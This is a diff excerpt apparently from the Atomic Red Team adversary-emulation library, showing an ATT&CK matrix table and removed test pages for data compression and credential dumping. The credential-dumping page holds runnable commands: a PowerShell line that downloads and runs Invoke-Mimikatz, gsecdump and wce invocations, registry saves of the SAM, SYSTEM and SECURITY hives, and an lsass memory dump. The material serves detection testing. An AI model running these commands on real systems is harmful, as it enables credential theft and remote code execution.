| | [Mshta](./T1170/T1170.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Launch Daemon](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Deobfuscate/Decode Files or Information](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [LLMNR/NBT-NS Poisoning](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Information Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Taint Shared Content](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| | [PowerShell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [New Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Disabling Security Tools](./T1089/T1089.md) | [Network Sniffing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Network Configuration Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Third-party Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | [Remote Access Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| | [Regsvcs/Regasm](./T1121/T1121.md) | [External Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Path Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Password Filter DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Network Connections Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Windows Admin Shares](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | [Remote File Copy](./T1105/T1105.md) |
|
||||
| | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Private Keys](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | [Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [File Deletion](./T1107/T1107.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Service Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | [Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hooking](./T1179/T1179.md) | [Process Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Securityd Memory](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Time Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | [Standard Non-Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| | [Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hypervisor](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [SID-History Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Two-Factor Authentication Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | [Uncommonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| | [Service Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [HISTCONTROL](./T1148/T1148.md) | | | | | | [Web Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
|
||||
| | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hidden Files and Directories](./T1158/T1158.md) | | | | | | |
|
||||
| | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Setuid and Setgid](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hidden Users](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | [Source](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [LSASS Driver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Startup Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Launch Agent](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Sudo](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | [Third-party Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Launch Daemon](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Sudo Caching](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | [Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | [Trusted Developer Utilities](./T1127/T1127.md) | [Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Indicator Removal on Host](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | [User Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Login Item](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Indirect Command Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | [Windows Management Instrumentation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Logon Scripts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Install Root Certificate](./T1130/T1130.md) | | | | | | |
|
||||
| | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Modify Existing Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [InstallUtil](./T1118/T1118.md) | | | | | | |
|
||||
| | | [Netsh Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [LC_MAIN Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [New Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Office Application Startup](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Masquerading](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Path Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Modify Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Mshta](./T1170/T1170.md) | | | | | | |
|
||||
| | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [NTFS File Attributes](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Network Share Connection Removal](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Rc.common](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Obfuscated Files or Information](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Re-opened Applications](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Redundant Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Registry Run Keys / Start Folder](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Process Doppelgänging](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Process Hollowing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Process Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Screensaver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Redundant Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Security Support Provider](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
|
||||
| | | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
|
||||
| | | [Shortcut Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Startup Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rundll32](./T1085/T1085.md) | | | | | | |
|
||||
| | | [System Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Software Packing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Timestomp](./T1099/T1099.md) | | | | | | |
|
||||
| | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | |
|
||||
| | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
| | | | | [Web Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
|
||||
|
||||
@@ -1,53 +0,0 @@
|
||||
# T1002 - Data Compressed
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002)
|
||||
<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.
|
||||
|
||||
Detection: Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.
|
||||
|
||||
If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring
|
||||
|
||||
Requires Network: No</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Compress Data for Exfiltration With PowerShell](#atomic-test-1---compress-data-for-exfiltration-with-powershell)
|
||||
|
||||
- [Atomic Test #2 - Compress Data for Exfiltration With Rar](#atomic-test-2---compress-data-for-exfiltration-with-rar)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
|
||||
TODO
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| input_file | Path that should be compressed into our output file | Path | C:\*|
|
||||
| output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip|
|
||||
|
||||
#### Run it with `powershell`!
|
||||
```
|
||||
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Compress Data for Exfiltration With Rar
|
||||
TODO
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `powershell`!
|
||||
```
|
||||
rar a -r #{output_file} #{input_file}
|
||||
```
|
||||
<br/>
|
||||
@@ -1,210 +0,0 @@
|
||||
# T1003 - Credential Dumping
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003)
|
||||
<blockquote>Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
|
||||
|
||||
Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
|
||||
|
||||
===SAM (Security Accounts Manager)===
|
||||
|
||||
The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.
|
||||
|
||||
A number of tools can be used to retrieve the SAM file through in-memory techniques:
|
||||
* pwdumpx.exe
|
||||
* gsecdump
|
||||
* Mimikatz
|
||||
* secretsdump.py
|
||||
|
||||
Alternatively, the SAM can be extracted from the Registry with Reg:
|
||||
* <code>reg save HKLM\sam sam</code>
|
||||
* <code>reg save HKLM\system system</code>
|
||||
|
||||
Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)
|
||||
|
||||
Notes:
|
||||
Rid 500 account is the local, in-built administrator.
|
||||
Rid 501 is the guest account.
|
||||
User accounts start with a RID of 1,000+.
|
||||
|
||||
===Cached Credentials===
|
||||
|
||||
The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.
|
||||
|
||||
A number of tools can be used to retrieve the SAM file through in-memory techniques.
|
||||
* pwdumpx.exe
|
||||
* gsecdump
|
||||
* Mimikatz
|
||||
|
||||
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
|
||||
|
||||
Notes:
|
||||
Cached credentials for Windows Vista are derived using PBKDF2.
|
||||
|
||||
===Local Security Authority (LSA) Secrets===
|
||||
|
||||
With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.
|
||||
|
||||
When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.
|
||||
|
||||
A number of tools can be used to retrieve the SAM file through in-memory techniques.
|
||||
* pwdumpx.exe
|
||||
* gsecdump
|
||||
* Mimikatz
|
||||
* secretsdump.py
|
||||
|
||||
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
|
||||
|
||||
Notes:
|
||||
The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.
|
||||
Windows 10 adds protections for LSA Secrets described in Mitigation.
|
||||
|
||||
===NTDS from Domain Controller===
|
||||
|
||||
Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)
|
||||
|
||||
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
|
||||
|
||||
* Volume Shadow Copy
|
||||
* secretsdump.py
|
||||
* Using the in-built Windows tool, ntdsutil.exe
|
||||
* Invoke-NinjaCopy
|
||||
|
||||
===Group Policy Preference (GPP) Files===
|
||||
|
||||
Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.
|
||||
|
||||
These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)
|
||||
|
||||
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
|
||||
|
||||
* Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp"
|
||||
* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
|
||||
* gpprefdecrypt.py
|
||||
|
||||
Notes:
|
||||
On the SYSVOL share, the following can be used to enumerate potential XML files.
|
||||
dir /s *.xml
|
||||
|
||||
===Service Principle Names (SPNs)===
|
||||
|
||||
See Kerberoasting.
|
||||
|
||||
===Plaintext Credentials===
|
||||
|
||||
After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.
|
||||
|
||||
SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.
|
||||
|
||||
The following SSPs can be used to access credentials:
|
||||
|
||||
Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
|
||||
Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)
|
||||
Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
|
||||
CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)
|
||||
|
||||
The following tools can be used to enumerate credentials:
|
||||
|
||||
* Windows Credential Editor
|
||||
* Mimikatz
|
||||
|
||||
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
|
||||
|
||||
For example, on the target host use procdump:
|
||||
* <code>procdump -ma lsass.exe lsass_dump</code>
|
||||
|
||||
Locally, mimikatz can be run:
|
||||
* <code>sekurlsa::Minidump lsassdump.dmp</code>
|
||||
* <code>sekurlsa::logonPasswords</code>
|
||||
|
||||
===DCSync===
|
||||
|
||||
DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in Account Manipulation. (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)
|
||||
|
||||
Detection: Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity.
|
||||
|
||||
Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well.
|
||||
|
||||
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
|
||||
|
||||
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
|
||||
|
||||
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
|
||||
|
||||
Platforms: Windows
|
||||
|
||||
Data Sources: API monitoring, Process command-line parameters, Process monitoring, PowerShell logs
|
||||
|
||||
Permissions Required: Administrator, SYSTEM
|
||||
|
||||
Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Powershell Mimikatz](#atomic-test-1---powershell-mimikatz)
|
||||
|
||||
- [Atomic Test #2 - Gsecdump](#atomic-test-2---gsecdump)
|
||||
|
||||
- [Atomic Test #3 - Windows Credential Editor](#atomic-test-3---windows-credential-editor)
|
||||
|
||||
- [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Powershell Mimikatz
|
||||
Dumps Credentials via Powershell by invoking a remote mimikatz script
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
|
||||
|
||||
#### Run it with `powershell`!
|
||||
```
|
||||
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Gsecdump
|
||||
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
gsecdump -a
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Windows Credential Editor
|
||||
http://www.ampliasecurity.com/research/windows-credentials-editor/
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
wce -o #{output_file}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Registry dump of SAM, creds, and secrets
|
||||
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
|
||||
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
reg save HKLM\sam sam
|
||||
reg save HKLM\system system
|
||||
reg save HKLM\security security
|
||||
```
|
||||
<br/>
|
||||
@@ -1,35 +0,0 @@
|
||||
# T1046 - Network Service Scanning
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1046)
|
||||
<blockquote>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.
|
||||
|
||||
